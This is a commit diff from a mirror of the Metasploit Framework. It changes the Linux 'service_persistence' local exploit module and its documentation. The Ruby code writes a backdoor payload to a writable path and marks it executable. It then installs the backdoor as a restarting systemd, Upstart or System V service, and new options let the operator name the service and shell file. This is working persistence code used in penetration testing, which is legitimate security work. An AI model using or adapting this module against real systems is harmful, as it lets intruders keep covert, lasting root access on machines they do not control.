infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fedora compatibility, added naming options

bug/bundler_fix
h00die 2016-06-25 08:43:55 -04:00
parent bc293e2a8b
commit 1c20122648
2 changed files with 23 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
documentation/modules/exploit/linux/local/service_persistence.md
View File

@ -6,6 +6,8 @@
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Centos 5 (System V)
5. Fedora 18 (systemd)
6. Fedora 20 (systemd)
## Verification Steps
@ -40,6 +42,14 @@
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
**SERVICE**
The name of the service to create. If not chosen, a 7 character random one is created.
**SHELL_NAME**
The name of the file to write with our shell. If not chosen, a 5 character random one is created.
## Scenarios
### System V (Centos 5 - root - chkconfig)

21
modules/exploits/linux/local/service_persistence.rb
View File

@ -29,10 +29,12 @@ class MetasploitModule < Msf::Exploit::Local
Ubuntu <= 9.04
Upstart:
CentOS 6
Fedora >= 9, < 15
Ubuntu >= 9.10, <= 14.10
systemd:
CentOS 7
Debian >=7, <=8
Debian >= 7, <=8
Fedora >= 15
Ubuntu >= 15.04
Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.
),
@ -73,7 +75,9 @@ class MetasploitModule < Msf::Exploit::Local
register_options(
[
OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin'])
OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
OptString.new('SERVICE', [false, 'Name of service to create'])
], self.class
)
end
@ -115,7 +119,8 @@ class MetasploitModule < Msf::Exploit::Local
end
def write_shell(path)
backdoor = "#{path}/#{Rex::Text.rand_text_alpha(5)}"
file_name = datastore['SHELL_NAME'] ? datastore['SHELL_NAME'] : Rex::Text.rand_text_alpha(5)
backdoor = "#{path}/#{file_name}"
vprint_status("Writing backdoor to #{backdoor}")
write_file(backdoor, payload.encoded)
cmd_exec("chmod 711 #{backdoor}")
@ -126,8 +131,8 @@ class MetasploitModule < Msf::Exploit::Local
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
script = "[Unit]\n"
script << "Description=Start daemon at boot time\n"
script << "After=networking.service\n"
script << "Requires=networking.service\n"
script << "After=\n"
script << "Requires=\n"
script << "[Service]\n"
script << "RestartSec=10s\n"
script << "Restart=always\n"
@ -136,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "[Install]\n"
script << "WantedBy=multi-user.target\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
write_file("/lib/systemd/system/#{service_filename}.service", script)
vprint_status('Enabling service')
@ -159,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "respawn\n"
script << "respawn limit unlimited\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
write_file("/etc/init/#{service_filename}.conf", script)
vprint_status('Starting service')
@ -263,7 +268,7 @@ class MetasploitModule < Msf::Exploit::Local
script << "esac\n"
script << "exit 0\n"
service_filename = Rex::Text.rand_text_alpha(7)
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init.d/#{service_filename}")
write_file("/etc/init.d/#{service_filename}", script)
cmd_exec("chmod 755 /etc/init.d/#{service_filename}")